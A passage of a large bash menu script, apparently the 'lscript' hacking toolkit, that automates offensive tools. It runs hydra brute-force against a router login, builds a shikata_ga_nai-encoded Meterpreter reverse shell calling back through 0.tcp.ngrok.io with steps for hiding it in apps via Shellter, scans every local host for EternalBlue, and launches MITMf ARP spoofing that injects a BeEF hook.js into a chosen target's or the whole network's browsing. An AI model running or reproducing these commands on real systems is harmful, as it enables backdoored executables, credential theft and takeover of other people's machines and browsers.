7960 sleep 3
7961 continue
7962 fi
7963 if [[ "$wls" != 1 ]]
7964 then
7965 echo -e ""$RS"Set a wordlist first"$CE""
7966 sleep 2
7967 continue
7968 fi
7969 TT=$(ifconfig | grep "$BI")
7970 if [[ "$TT" = "" ]]
7971 then
7972 echo -e ""$RS""$BI" is not available"$CE""
7973 sleep 2
7974 BI=""
7975 continue
7976 fi
7977 if [[ "$rqq" != 1 ]]
7978 then
7979 echo -e ""$RS"Please set the Request URI"$CE""
7980 sleep 2
7981 continue
7982 fi
7983 if [[ "$iss" != 1 ]]
7984 then
7985 echo -e ""$RS"Please set the invalid pass string"$CE""
7986 sleep 2
7987 continue
7988 fi
7989 if [[ "$upp" != 1 ]]
7990 then
7991 echo -e ""$RS"Please set the ^USER^ & ^PASS^ field"$CE""
7992 sleep 2
7993 continue
7994 fi
7995 if [[ "$FM" = "" ]]
7996 then
7997 echo -e ""$RS"Set the Form first"$CE""
7998 sleep 2
7999 continue
8000 fi
8001 echo -e ""$BS"Searching gateway on "$BI""$CE"..."
8002 sleep 1
8003 GATE=$(find_gateways "$BI" interface)
8004 TTT=$(is_it_an_ip "$GATE")
8005 if [[ "$TTT" != 1 ]]
8006 then
8007 echo -e ""$RS"Couldn't find your gateway."$CE""
8008 sleep 2
8009 echo -e ""$RS"Make sure you are connected to a network"$CE""
8010 sleep 3
8011 continue
8012 else
8013 echo -e ""$YS"Gateway found: "$GATE""$CE""
8014 sleep 2
8015 fi
8016 clear
8017 echo -e ""$RS"Do you have permission to bruteforce this network?"$CE""$YNONLY""
8018 read PERM
8019 if [[ "$PERM" != "y" && "$PERM" != "Y" ]]
8020 then
8021 echo -e ""$RS"You cannot proceed then"$CE""
8022 sleep 3
8023 continue
8024 fi
8025 hydra -l "$US" -P "$WL" -e nsr -f -V "$GATE" "$FM" ""$RQ":"$UP":"$IS""
8026 echo -e "$PAKTGB"
8027 $READAK
8028 fi
8029done
8030}
8031function find_gateways()
8032{
8033 #example: find_gateways wlan0 interface
8034 FG1="$1"
8035 FG2="$2"
8036 if [[ "$FG1" = "" ]]
8037 then
8038 echo -e ""$BS"Gateways"$CE": "
8039 n=0
8040 ethr=$(ifconfig | grep "$ETH")
8041 if [[ "$ethr" != "" ]]
8042 then
8043 ethd=$(route -n | awk -v int1="$ETH" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
8044 chi=$(is_it_an_ip "$ethd")
8045 if [[ "$ethd" != "" && "$chi" = 1 ]]
8046 then
8047 echo -e ""$ETH" = "$YS""$ethd""$CE""
8048 n=1
8049 fi
8050 fi
8051 wlanr=$(ifconfig | grep "$WLANN")
8052 if [[ "$wlanr" != "" ]]
8053 then
8054 wland=$(route -n | awk -v int1="$WLANN" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
8055 chi=$(is_it_an_ip "$wland")
8056 if [[ "$wland" != "" && "$chi" = 1 ]]
8057 then
8058 echo -e ""$WLANN" = "$YS""$wland""$CE""
8059 n=1
8060 fi
8061 fi
8062 wlanmr=$(ifconfig | grep "$WLANNM")
8063 if [[ "$wlanmr" != "" ]]
8064 then
8065 wlanmd=$(route -n | awk -v int1="$WLANNM" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
8066 chi=$(is_it_an_ip "$wlanmd")
8067 if [[ "$wlanmd" != "" && "$chi" = 1 ]]
8068 then
8069 echo -e ""$WLANNM" = "$YS""$wlanmd""$CE""
8070 n=1
8071 fi
8072 fi
8073 if [[ "$n" = 0 ]]
8074 then
8075 echo -e ""$RS"No known interfaces found available"$CE""
8076 fi
8077 else
8078 if [[ "$FG2" = "interface" ]]
8079 then
8080 inttos=$(ifconfig | grep "$FG1")
8081 if [[ "$inttos" != "" ]]
8082 then
8083 gate=$(route -n | awk -v int1="$FG1" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
8084 cho=$(is_it_an_ip "$gate")
8085 if [[ "$cho" = 1 ]]
8086 then
8087 echo "$gate"
8088 fi
8089 else
8090 echo 0
8091 fi
8092 #~ elif [[ "$FG2" = "ip" ]]
8093 #~ then
8094 #~ iptos=$(ifconfig | grep "$FG1")
8095 #~ if [[ "$iptos" != "" ]]
8096 #~ then
8097 #~ dot=$(give_ip_take_zero "$FG1" "dot")
8098 #~ gate=$(route -n | awk -v int1="$dot" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
8099 #~ echo "$gate"
8100 #~ cho=$(is_it_an_ip "$gate")
8101 #~ if [[ "$cho" = 1 ]]
8102 #~ then
8103 #~ echo "$gate"
8104 #~ fi
8105 #~ else
8106 #~ echo 0
8107 #~ fi
8108 #~ else
8109 #~ echo -e ""$RS"Could not identify 2nd parameter"$CE""
8110 #~ sleep 4
8111 fi
8112 fi
8113}
8114function select_interface
8115{
8116 while true
8117 do
8118 clear
8119 TERMINALTITLE="Select interface"
8120 dash_calc
8121 printf '\033]2;SELECT INTERFACE\a'
8122 TT=$(ifconfig | grep "$WLANN:")
8123 if [[ "$TT" != "" ]]
8124 then
8125 echo -e ""$YS" 1"$CE") "$WLANN""
8126 else
8127 echo -e ""$RS" 1"$CE") "$RS""$WLANN""$CE""
8128 fi
8129 TT=$(ifconfig | grep "$ETH:")
8130 if [[ "$TT" != "" ]]
8131 then
8132 echo -e ""$YS" 2"$CE") "$ETH""
8133 else
8134 echo -e ""$RS" 2"$CE") "$RS""$ETH""$CE""
8135 fi
8136 echo -e ""$YS" 3"$CE") Manually type an interface"
8137 echo -e ""$YS" b"$CE") Go back"
8138 echo -e "Choose: "
8139 read CI
8140 if [[ "$CI" = 1 ]]
8141 then
8142 TT=$(ifconfig | grep "$WLANN:")
8143 if [[ "$TT" != "" ]]
8144 then
8145 SINT="$WLANN"
8146 OUTPUT="$SINT"
8147 inter=0
8148 break
8149 else
8150 inter=1
8151 OUTPUT=0
8152 echo -e ""$RS"Could not find this interface"$CE""
8153 sleep 2
8154 continue
8155 fi
8156 elif [[ "$CI" = 2 ]]
8157 then
8158 TT=$(ifconfig | grep "$ETH:")
8159 if [[ "$TT" != "" ]]
8160 then
8161 SINT="$ETH"
8162 OUTPUT="$SINT"
8163 inter=0
8164 break
8165 else
8166 inter=1
8167 OUTPUT=0
8168 echo -e ""$RS"Could not find this interface"$CE""
8169 sleep 2
8170 continue
8171 fi
8172 elif [[ "$CI" = 3 ]]
8173 then
8174 echo -e "Interface to use: "
8175 read ITU
8176 TT=$(ifconfig | grep "$ITU:")
8177 if [[ "$TT" != "" ]]
8178 then
8179 SINT="$ITU"
8180 OUTPUT="$SINT"
8181 inter=0
8182 break
8183 else
8184 echo -e ""$RS"Could not find this interface"$CE""
8185 echo -e "Do you still want to use it?"$YNNO": "
8186 read SU
8187 if [[ "$SU" = "y" ]]
8188 then
8189 SINT="$ITU"
8190 OUTPUT="$SINT"
8191 inter=0
8192 break
8193 else
8194 OUTPUT=0
8195 continue
8196 fi
8197 fi
8198 elif [[ "$CI" = "b" ]]
8199 then
8200 clear
8201 break
8202 fi
8203 done
8204}
8205function donate_option
8206{
8207 while true
8208 do
8209 clear
8210 TERMINALTITLE="DONATION"
8211 dash_calc
8212 printf '\033]2;DONATION\a'
8213 echo -e "If you found my script useful, you can buy me a coffee :)"
8214 echo -e ""$LBS"Total lscript donations:"$CE" $DONATIONS"
8215 echo -e ""$YS" 1"$CE") Open browser to donate"
8216 echo -e ""$YS" 2"$CE") Copy donation link"
8217 echo -e ""$YS" b"$CE") I don't care about your work! :P"
8218 echo -e "Choose: "
8219 read DON
8220 if [[ "$DON" = "1" ]]
8221 then
8222 gio open "https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=GC9RSY4CS6KAY"
8223 elif [[ "$DON" = "2" ]]
8224 then
8225 echo -e "Donation link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=GC9RSY4CS6KAY"
8226 echo -e "$PAKTGB"
8227 $READAK
8228 elif [[ "$DON" = "back" || "$DON" = "b" || "$DON" = "00" ]]
8229 then
8230 BACKL=1
8231 break
8232 elif [[ "$DON" = "0" ]]
8233 then
8234 clear
8235 exit
8236 fi
8237 done
8238}
8239function ngrok_option
8240{
8241 while true
8242 do
8243 clear
8244 if [[ -f /root/ngrok ]]
8245 then
8246 TERMINALTITLE="NGROK"
8247 dash_calc
8248 printf '\033]2;NGROK\a'
8249 echo -e ""$YS"help"$CE") How to make it work?"
8250 echo -e ""$YS" 1"$CE") Open a tcp port"
8251 echo -e ""$YS" 2"$CE") Open a tls port"
8252 echo -e ""$YS" 3"$CE") Open a http port"
8253 echo -e ""$YS" 4"$CE") Intergrate with Shellter"
8254 echo -e ""$YS" 5"$CE") Set your ngrok authtoken"
8255 echo -e ""$YS" b"$CE") Go back"
8256 echo -e "Choose: "
8257 read NG
8258 clear
8259 if [[ "$NG" = "help" || "$NG" = "h" ]]
8260 then
8261 echo -e "With ngrok, you can port forward without router intergration."
8262 echo -e "It is free, HOWEVER:"
8263 echo -e "---to open a tcp port, you need to sign up (it's too easy)"
8264 echo -e " Go to https://ngrok.com and choose "$YS"sign up"$CE"."
8265 echo -e " When that's done, copy the given "$YS"authtoken"$CE"."
8266 echo -e " (If you can't find it go to: https://dashboard.ngrok.com/auth )"
8267 echo -e " Then select the 'set your authtoken' option in lscript, and paste it."
8268 echo -e "---to make a reverse tcp payload:"
8269 echo -e " You need to set the payload to: windows/meterpreter/reverse_tcp_dns"
8270 echo -e "$PAKTGB"
8271 $READAK
8272 elif [[ "$NG" = 1 || "$NG" = 2 || "$NG" = 3 ]]
8273 then
8274 echo -e "Type the local port to forward: "
8275 read PORTL
8276 if [[ "$NG" = 1 ]]
8277 then
8278 PROT="tcp"
8279 elif [[ "$NG" = 2 ]]
8280 then
8281 PROT="tls"
8282 else
8283 PROT="http"
8284 fi
8285 export PORTL
8286 export PROT
8287 xterm -geometry 85x15+9999+999999 -e bash -c './ngrok $PROT $PORTL; exec bash' & disown
8288 elif [[ "$NG" = 4 ]]
8289 then
8290 while true
8291 do
8292 clear
8293 echo -e ""$YS" 1"$CE") Make a raw tcp payload for Shellter"
8294 echo -e ""$YS" 2"$CE") How to intergrate it"
8295 echo -e ""$YS" b"$CE") Go back"
8296 echo -e "Choose:"
8297 read SHINT
8298 clear
8299 if [[ "$SHINT" = 1 ]]
8300 then
8301 while true
8302 do
8303 if [[ "$NGPORT" = "" ]]
8304 then
8305 NGPORT="\e[1;31mNONE\e[0m"
8306 fi
8307 clear
8308 echo -e ""$YS" 1"$CE") Set the Ngrok tcp port CURRENT:"$NGPORT""
8309 #~ echo -e ""$YS" 2"$CE") Set your local tcp port CURRENT:"$LPORT""
8310 echo -e ""$YS" b"$CE") Go back"
8311 echo -e ""$YS"run"$CE") Make the payload"
8312 echo -e "Choose: "
8313 read RP
8314 if [[ "$RP" = 1 ]]
8315 then
8316 echo -e "Ngrok port: "
8317 read NGPORT
8318 elif [[ "$RP" = "back" || "$RP" = "b" ]]
8319 then
8320 break
8321 elif [[ "$RP" = "run" ]]
8322 then
8323 RAW=rawfud
8324 NUMB=1
8325 while true
8326 do
8327 RAWN=""$RAW""$NUMB""
8328 if [[ -f /root/Desktop/"$RAWN".raw ]]
8329 then
8330 NUMB=$((NUMB+1))
8331 else
8332 break
8333 fi
8334 done
8335 msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=0.tcp.ngrok.io LPORT=$NGPORT -e x86/shikata_ga_nai -i 15 -f raw -o /root/Desktop/"$RAWN".raw
8336 sleep 2
8337 if [[ -f /root/Desktop/"$RAWN".raw ]]
8338 then
8339 clear
8340 echo -e "Payload was saved to /root/Desktop/"$RAWN".raw"
8341 fi
8342 echo -e "$PAKTGB"
8343 $READAK
8344 fi
8345 done
8346 elif [[ "$SHINT" = 2 ]]
8347 then
8348 echo -e "First you should make a raw payload with option 1."
8349 echo -e "Then open shellter and select your app to be injected."
8350 echo -e "Then, on stealth mode select y."
8351 echo -e "Select to type a custom payload, NOT listed."
8352 echo -e "Then type the path of the payload you have created on option 1."
8353 echo -e "For the listener, the payload is windows/meterpreter/reverse_tcp_dns"
8354 echo -e "LHOST is 127.0.0.1 and LPORT is the port you opened to ngrok."
8355 echo -e "$PAKTGB"
8356 $READAK
8357 elif [[ "$SHINT" = "back" || "$SHINT" = "b" ]]
8358 then
8359 break
8360 fi
8361 done
8362 elif [[ "$NG" = "back" || "$NG" = "b" || "$NG" = "00" ]]
8363 then
8364 clear
8365 break
8366 elif [[ "$NG" = 0 ]]
8367 then
8368 clear
8369 exit
8370 elif [[ "$NG" = 5 ]]
8371 then
8372 echo -e "Type your authtoken: "
8373 read AUTHT
8374 if [[ "$AUTHT" != "" ]]
8375 then
8376 ./ngrok authtoken $AUTHT
8377 echo -e "$PAKTGB"
8378 $READAK
8379 fi
8380 fi
8381 else
8382 echo -e ""$RS"Ngrok is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
8383 read INSTALL
8384 if [[ "$INSTALL" = "install" ]]
8385 then
8386 install_ngrok
8387 fi
8388 fi
8389 done
8390}
8391function geolocate_ip()
8392{
8393 locbool=1
8394 echo -e ""$BS"Please wait..."$CE""
8395 A1="$1"
8396 AA1=$(is_it_an_ip "$A1")
8397 if [[ "$AA1" = 1 ]]
8398 then
8399 country=$(curl ipinfo.io/"$A1"/country 2>/dev/null)
8400 if [[ "$country" = "" ]]
8401 then
8402 country=""$RS"Not found"$CE""
8403 fi
8404 loc=$(curl ipinfo.io/"$A1"/loc 2>/dev/null)
8405 if [[ "$loc" = "" ]]
8406 then
8407 locbool=0
8408 loc=""$RS"Not found"$CE""
8409 fi
8410 city=$(curl ipinfo.io/"$A1"/city 2>/dev/null)
8411 if [[ "$city" = "" ]]
8412 then
8413 city=""$RS"Not found"$CE""
8414 fi
8415 org=$(curl ipinfo.io/"$A1"/org 2>/dev/null)
8416 if [[ "$org" = "" ]]
8417 then
8418 org=""$RS"Not found"$CE""
8419 fi
8420 postal=$(curl ipinfo.io/"$A1"/postal 2>/dev/null)
8421 if [[ "$postal" = "" ]]
8422 then
8423 postal=""$RS"Not found"$CE""
8424 fi
8425 region=$(curl ipinfo.io/"$A1"/region 2>/dev/null)
8426 if [[ "$region" = "" ]]
8427 then
8428 region=""$RS"Not found"$CE""
8429 fi
8430 hostname=$(curl ipinfo.io/"$A1"/hostname 2>/dev/null)
8431 if [[ "$hostname" = "" ]]
8432 then
8433 hostname=""$RS"Not found"$CE""
8434 fi
8435 echo -e " Country: $country"
8436 echo -e " Region: $region"
8437 echo -e " Location: $loc"
8438 echo -e " City: $city"
8439 echo -e " Postal: $postal"
8440 echo -e " Hostname: $hostname"
8441 echo -e "Organization: $org"
8442 if [[ "$locbool" = 0 ]]
8443 then
8444 echo -e ""$RS" m"$CE") Open google maps location"
8445 else
8446 echo -e ""$YS" m"$CE") Open google maps location"
8447 fi
8448 echo -e ""$YS" *"$CE") Go back"
8449 echo -e "Choose: "
8450 read ge
8451 if [[ "$ge" = "m" ]]
8452 then
8453 if [[ "$locbool" = 0 ]]
8454 then
8455 echo -e ""$RS"Location was not found"$CE""
8456 sleep 3
8457 else
8458 gio open https://www.google.gr/maps/search/"$loc"/
8459 fi
8460 else
8461 clear
8462 BACKL=1
8463 fi
8464 else
8465 echo 0
8466 fi
8467}
8468function ip_scan()
8469{
8470
8471while true
8472do
8473 #passing interface
8474 IPF=$1
8475 #passing mode if any (1=choosable 2=only rescanable)
8476 #Mode 1 is for choosing and returning the IP.
8477 #Mode 2 is for echoing the scan, not choosing.
8478 MODE=$2
8479 export IPF
8480 if [[ "$IPF" = "" ]]
8481 then
8482 echo -e ""$RS"Error 6. No parameters passed"$CE""
8483 sleep 3
8484 break
8485 fi
8486 #getting local ip
8487 LLL=$(local_ips $IPF)
8488 #getting zero ip
8489 ZERO=$(give_ip_take_zero $LLL)
8490 export ZERO
8491 echo -e ""$BS"Scanning, please wait..."$CE""
8492 tempfile="/root/lscript/tempscan.txt"
8493 xterm -geometry 1x1+9999+999999 -e "arp-scan -I "$IPF" "$ZERO"/24 | tee $tempfile"
8494 #gnome-terminal -- arp-scan -I "$IPF" "$ZERO"/24 | tee $tempfile
8495 clear
8496 ######
8497 T1=$(cat $tempfile | grep "Ending arp-scan")
8498 if [[ "$T1" = "" ]]
8499 then
8500 lines=$(cat $tempfile | awk 'END{print NR}')
8501 hosts=$((lines-3))
8502 else
8503 lines=$(cat $tempfile | awk 'END{print NR}')
8504 hosts=$((lines-5))
8505 fi
8506 hostsbackup="$hosts"
8507 if [[ "$hosts" -le 0 ]]
8508 then
8509 echo -e ""$RS"No hosts found"$CE""
8510 sleep 1
8511 else
8512 echo -e ""$BS"Host(s) found:"$CE""
8513 ##########
8514 n=1
8515 n2=2
8516 while [[ "$n" -le "$hosts" ]]
8517 do
8518 #Hosts start from line 3
8519 n1=$((n2+n))
8520 host[$n]=$(cat "$tempfile" | awk -v an1="$n1" '{if(NR==an1 && $0 !~ /DUP:/){print $1}}')
8521 if [[ "${host[$n]}" = "" ]]
8522 then
8523 #sometimes there are duplicate IPs.This should remove them.
8524 n2=$((n2+1))
8525 hosts=$((hosts-1))
8526 #~ n=$((n+1))
8527 continue
8528 fi
8529 size=${#host[$n]}
8530 sized=$((20-size))
8531 SPACESN=" "
8532 numcalc=1
8533 while [ $numcalc != $sized ]
8534 do
8535 SPACESN=""${SPACESN}" "
8536 numcalc=$(( numcalc+1 ))
8537 done
8538 mi[$n]=$(cat "$tempfile" | awk -v an1="$n1" '{if(NR==an1){print $2}}')
8539 im[$n]=$(cat "$tempfile" | awk -v an1="$n1" '{if(NR==an1){print $3}}')
8540 if [[ "$MODE" = 1 ]]
8541 then
8542 echo -e ""$YS" $n"$CE") "${host[$n]}"${SPACESN}"${mi[$n]}" "${im[$n]}""
8543 else
8544 echo -e ""${host[$n]}"${SPACESN}"${mi[$n]}" "${im[$n]}""
8545 fi
8546 n=$((n+1))
8547 done
8548 if [[ "$MODE" = 1 ]]
8549 then
8550 echo -e ""$YS" r"$CE") Rescan"
8551 echo -e ""$YS" b"$CE") Go back"
8552 echo -e "Choose: "
8553 read sch
8554 if [[ "$sch" = "b" ]]
8555 then
8556 echo ""
8557 elif [[ "$sch" = "r" ]]
8558 then
8559 clear
8560 continue
8561 elif [[ "$sch" -le "$hosts" && "$sch" -ge 1 ]]
8562 then
8563 OUTPUT="${host[$sch]}"
8564 export OUTPUT
8565 #~ echo "$OUTPUT"
8566 fi
8567 else
8568 echo -e ""$YS" e"$CE") Check eternalblue exploit on IPs"
8569 echo -e ""$YS" r"$CE") Rescan"
8570 echo -e "Press "$YS"any other key"$CE" to go back"
8571 read -n 1 ko
8572 if [[ "$ko" = "r" ]]
8573 then
8574 clear
8575 continue
8576 elif [[ "$ko" = "e" ]]
8577 then
8578 n=1
8579 totalhosts=""
8580 while [[ "$n" -le "$hostsbackup" ]]
8581 do
8582 totalhosts=""$totalhosts" "${host["$n"]}""
8583 n=$((n+1))
8584 done
8585 clear
8586 if [[ "$totalhosts" = "" || "$totalhosts" = " " ]]
8587 then
8588 echo -e ""$RS"No hosts found to check"$CE""
8589 sleep 2
8590 continue
8591 fi
8592 echo -e ""$BS"RHOSTS"$CE" <- "$totalhosts""
8593 sleep 2
8594 if [[ ! -d "$LPATH"/rce ]]
8595 then
8596 mkdir "$LPATH"/rce
8597 fi
8598 echo "use auxiliary/scanner/smb/smb_ms17_010" > "$LPATH"/rce/eternalbluerc.rc
8599 echo "set RHOSTS "$totalhosts"" >> "$LPATH"/rce/eternalbluerc.rc
8600 echo "exploit" >> "$LPATH"/rce/eternalbluerc.rc
8601 echo -e ""$BS"Launching msfconsole. Please wait..."$CE""
8602 msfconsole -r "$LPATH"/rce/eternalbluerc.rc
8603 else
8604 BACKL=1
8605 break
8606 fi
8607 fi
8608 ##########
8609 fi
8610 break
8611 #~ fi
8612 ######
8613done
8614
8615}
8616function browser_exploiting
8617{
8618 if [[ ! -f /usr/bin/arp-scan && ! -f /usr/sbin/arp-scan ]]
8619 then
8620 echo -e ""$BS"Installing arp-scan"$CE""
8621 install_arp_scan
8622 clear
8623 fi
8624 TAR=""
8625 SINT=""
8626 beefrunning=0
8627 clear
8628 while true
8629 do
8630 clear
8631 TERMINALTITLE="Auto-exploit browser"
8632 dash_calc
8633 printf '\033]2;AUTO-EXPLOIT BROWSER\a'
8634 if [[ "$SINT" = "" ]]
8635 then
8636 WL=$(ifconfig | grep "$WLANN:")
8637 if [[ "$WL" != "" ]]
8638 then
8639 SINT="$WLANN"
8640 inter=0
8641 else
8642 EL=$(ifconfig | grep "$ETH:")
8643 if [[ "$EL" != "" ]]
8644 then
8645 SINT="$ETH"
8646 inter=0
8647 else
8648 SINT=""$RS"Not found"$CE""
8649 inter=1
8650 fi
8651 fi
8652
8653 fi
8654 if [[ "$TAR" = "" ]]
8655 then
8656 TAR=""$RS"Not set"$CE""
8657 tarer=1
8658 fi
8659 echo -e ""$YS" 1"$CE") Select interface CURRENT:"$YS""$SINT""$CE""
8660 echo -e ""$YS" 2"$CE") Select target CURRENT:"$YS""$TAR""$CE""
8661 echo -e ""$YS" 3"$CE") Start BeEF"
8662 echo -e ""$YS" 4"$CE") Open BeEF's ui panel in browser"
8663 echo -e ""$YS" 5"$CE") Start MITMf"
8664 echo -e ""$YS" 6"$CE") Fix errors"
8665 #~ echo -e ""$YS" 4"$CE") Close all windows"
8666 echo -e ""$YS" i"$CE") Info"
8667 echo -e ""$YS" b"$CE") Go back"
8668 echo -e "Choose: "
8669 read AEB
8670 clear
8671 if [[ "$AEB" = "b" || "$AEB" = 00 ]]
8672 then
8673 clear
8674 BACKL=1
8675 break
8676 elif [[ "$AEB" = "i" ]]
8677 then
8678 clear
8679 echo -e ""$LGYS"On this menu you can exploit and control browsers on your network."
8680 echo -e "Instructions: "
8681 echo -e "BeEF:"
8682 echo -e " First you need to specify an interface. Then start BeEF."
8683 echo -e " Then open the UI panel and log in with beef:beef ."
8684 echo -e " There you will see if any online browsers."
8685 echo -e "MITMf:"
8686 echo -e " First you need to specify an interface and a target. Then start MITMf."
8687 echo -e " MITMf tries to inject the hook.js javascript to the target's website."$CE""
8688 echo -e "$PAKTGB"
8689 $READAK
8690 elif [[ "$AEB" = 6 ]]
8691 then
8692 while true
8693 do
8694 clear
8695 TERMINALTITLE="Fix errors"
8696 dash_calc
8697 printf '\033]2;FIX ERRORS\a'
8698 echo -e ""$YS" 1"$CE") MITMf error: Another process running on port 53"
8699 echo -e ""$YS" 2"$CE") BeEF error: Another process listening on port 3000"
8700 echo -e ""$YS" 3"$CE") MITMf error: Could not resolve Gateway's MAC"
8701 echo -e ""$YS" 4"$CE") MITMf error: [Errno 98] Address already in use"
8702 echo -e ""$YS" b"$CE") Go back"
8703 echo -e "Choose: "
8704 read AE
8705 clear
8706 if [[ "$AE" = 1 ]]
8707 then
8708 #~ echo -e "For this error, you need to type "$YS"netstat -lnpu | grep :53"$CE" to find the process that runs
8709 #~ on port 53 and kill it by "$YS"kill <PID>"$CE""
8710 PID1=$(lsof -t -i:53)
8711 if [[ "$PID1" = "" ]]
8712 then
8713 echo -e ""$RS"Could not find the process running on port 53"$CE""
8714 else
8715 kill $PID1 && echo -e ""$YS"Fixed."$CE""
8716 fi
8717 echo -e ""
8718 echo -e "$PAKTGB"
8719 $READAK
8720 elif [[ "$AE" = 2 ]]
8721 then
8722 echo -e "You are facing this error because you did not press "$YS"ctrl c"$CE" on BeEF's window
8723 to close it."
8724 echo -e ""
8725 PID1=$(lsof -t -i:3000)
8726 if [[ "$PID1" = "" ]]
8727 then
8728 echo -e ""$RS"Could not find the process running on port 3000"$CE""
8729 else
8730 kill $PID1 && echo -e ""$YS"Fixed."$CE""
8731 fi
8732 echo -e ""
8733 echo -e "$PAKTGB"
8734 $READAK
8735 elif [[ "$AE" = 3 ]]
8736 then
8737 echo -e "The only fix on this is to retry mitmf option until it starts correctly."
8738 echo -e ""
8739 echo -e "$PAKTGB"
8740 $READAK
8741 elif [[ "$AE" = 4 ]]
8742 then
8743 HT=$(lsof -t -i:80)
8744 if [[ "$HT" = "" ]]
8745 then
8746 echo -e ""$RS"Could not find the issue"$CE""
8747 else
8748 kill $HT && echo -e ""$YS"Fixed"$CE""
8749 fi
8750 echo -e ""
8751 echo -e "$PAKTGB"
8752 $READAK
8753 elif [[ "$AE" = "b" ]]
8754 then
8755 clear
8756 break
8757 fi
8758 done
8759 elif [[ "$AEB" = 4 ]]
8760 then
8761 #make sure BeEF is running.
8762 if [[ "$beefrunning" = 0 ]]
8763 then
8764 echo -e ""$RS"BeEF is not running"$CE""
8765 sleep 3
8766 else
8767 clear
8768 export SINT
8769 LOC=$(local_ips $SINT)
8770 export LOC
8771 CONF=$(is_it_an_ip $LOC)
8772 if [[ "$CONF" = 1 ]]
8773 then
8774 gio open http://"$LOC":3000/ui/panel
8775 else
8776 echo -e ""$RS"Could not find your local IP"$CE""
8777 sleep 3
8778 fi
8779 fi
8780 elif [[ "$AEB" = 2 ]]
8781 then
8782 if [[ "$inter" != 1 ]]
8783 then
8784 clear
8785 while true
8786 do
8787 clear
8788 TERMINALTITLE="Select target"
8789 dash_calc
8790 printf '\033]2;SELECT TARGET\a'
8791 echo -e ""$YS" 1"$CE") Scan and choose"
8792 echo -e ""$YS" 2"$CE") Type target's IP"
8793 echo -e ""$YS" 3"$CE") Target the whole network"
8794 echo -e ""$YS" b"$CE") Go back"
8795 echo -e "Choose: "
8796 read TARR
8797 clear
8798 if [[ "$TARR" = "b" ]]
8799 then
8800 break
8801 elif [[ "$TARR" = 1 ]]
8802 then
8803 ip_scan $SINT 1
8804 TARGETI="$OUTPUT"
8805 size=${#TARGETI}
8806 if [[ "$size" -le 16 && "$size" -ge 7 ]]
8807 then
8808 TAR="$TARGETI"
8809 tarer=0
8810 else
8811 tarer=1
8812 fi
8813 wholenetwork=0
8814 break
8815 elif [[ "$TARR" = 2 ]]
8816 then
8817 echo -e "Target: "
8818 read TARGETI
8819 size=${#TARGETI}
8820 if [[ "$size" -le 16 && "$size" -ge 7 ]]
8821 then
8822 TAR="$TARGETI"
8823 tarer=0
8824 else
8825 echo -e ""$RS"Invalid IP"$CE""
8826 tarer=1
8827 sleep 2
8828 fi
8829 wholenetwork=0
8830 break
8831 elif [[ "$TARR" = 3 ]]
8832 then
8833 TAR="EVERYONE"
8834 tarer=0
8835 wholenetwork=1
8836 break
8837 fi
8838 done
8839 else
8840 echo -e ""$RS"Select interface first"$CE""
8841 sleep 2
8842 fi
8843 elif [[ "$AEB" = 5 ]]
8844 then
8845 if [[ "$inter" = 0 && "$tarer" = 0 ]]
8846 then
8847 if [[ -d /root/MITMf ]]
8848 then
8849 mitmfint="$SINT"
8850 export mitmfint
8851 clear
8852 mitmfgate=$(route -n | grep "$mitmfint" | awk '{if($2!="0.0.0.0"){print $2}}')
8853 isit=$(is_it_an_ip "$mitmfgate")
8854 if [[ "$mitmfgate" != "" && "$isit" = 1 ]]
8855 then
8856 export mitmfgate
8857 clear
8858 TEST=$(ifconfig | grep $mitmfint)
8859 if [[ $TEST != "" ]]
8860 then
8861 iffile=""$LPATH"/iftemp.txt"
8862 ifconfig $mitmfint > $iffile
8863 mitmflocalip=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
8864 else
8865 echo -e ""$RS"ERROR 5. Could not find your local IP. Make sure you are connected to a network on interface "$SINT""$CE""
8866 echo -e "$PAKTGB"
8867 $READAK
8868 continue
8869 fi
8870 clear
8871 echo -e "hook.js URL path("$YS"Enter"$CE"=http://"$mitmflocalip":3000/hook.js): "
8872 read hookch
8873 if [[ "$hookch" = "" ]]
8874 then
8875 mitmfhook="http://"$mitmflocalip":3000/hook.js"
8876 else
8877 mitmfhook="$hookch"
8878 fi
8879 export mitmfhook
8880 cd /root/MITMf
8881 clear
8882 if [[ "$wholenetwork" == 0 ]]
8883 then
8884 xterm -hold -T "MITMf" -geometry 80x15+9999+9999 -e "python mitmf.py -i "$mitmfint" --spoof --arp --gateway "$mitmfgate" --target "$TAR" --hsts --inject --js-url "$mitmfhook" && echo -e '' && echo -e 'Close this window manually'" & disown
8885 else
8886 xterm -hold -T "MITMf" -geometry 80x15+9999+9999 -e "python mitmf.py -i "$mitmfint" --spoof --arp --gateway "$mitmfgate" --hsts --inject --js-url "$mitmfhook" && echo -e '' && echo -e 'Close this window manually'" & disown
8887 fi
8888 cd
8889 else
8890 echo -e ""$RS"ERROR 4. Could not find gateway. Make sure you are connected to a network on interface "$SINT""$CE""
8891 echo -e "$PAKTGB"
8892 $READAK
8893 fi
8894 else
8895 echo -e ""$RS"Mitmf is not installed.Type '"$CE""$YS"install"$CE""$RS"' to install it."
8896 read INSTALL
8897 if [[ "$INSTALL" = "install" ]]
8898 then
8899 install_mitmf
8900 fi
8901 fi
8902 cd
8903 else
8904 if [[ "$inter" = 1 ]]
8905 then
8906 echo -e ""$RS"No interface selected"$CE""
8907 fi
8908 if [[ "$tarer" = 1 ]]
8909 then
8910 echo -e ""$RS"No target selected"$CE""
8911 sleep 1
8912 fi
8913 sleep 2
8914 fi
8915 elif [[ "$AEB" = 3 ]]
8916 then
8917 if [[ "$inter" = 1 ]]
8918 then
8919 echo -e ""$RS"No interface selected"$CE""
8920 sleep 2
8921 continue
8922 fi
8923 cd /usr/share/beef-xss
8924 beefrunning=1
8925 xterm -T "BEEF" -hold -geometry 80x15+9999+0 -e "./beef && echo -e '' && beefrunning=0 && export beefrunning && echo -e 'Close this window manually'" & disown
8926 cd
8927 elif [[ "$AEB" = 0 ]]
8928 then
8929 clear
8930 exit
8931 elif [[ "$AEB" = 1 ]]
8932 then
8933 select_interface
8934
